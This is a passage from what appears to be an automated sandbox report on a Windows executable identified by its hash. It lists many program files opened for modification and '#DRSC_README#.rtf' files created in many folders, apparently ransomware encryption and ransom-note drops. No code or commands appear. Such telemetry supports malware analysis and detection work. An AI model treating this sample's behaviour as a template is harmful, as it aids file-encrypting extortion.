Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RepairPush.ppsx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\elevation_service.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\external_extensions.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ProtectJoin.xlt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lv.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ApproveUnregister.csv 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RepairUnregister.raw 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for 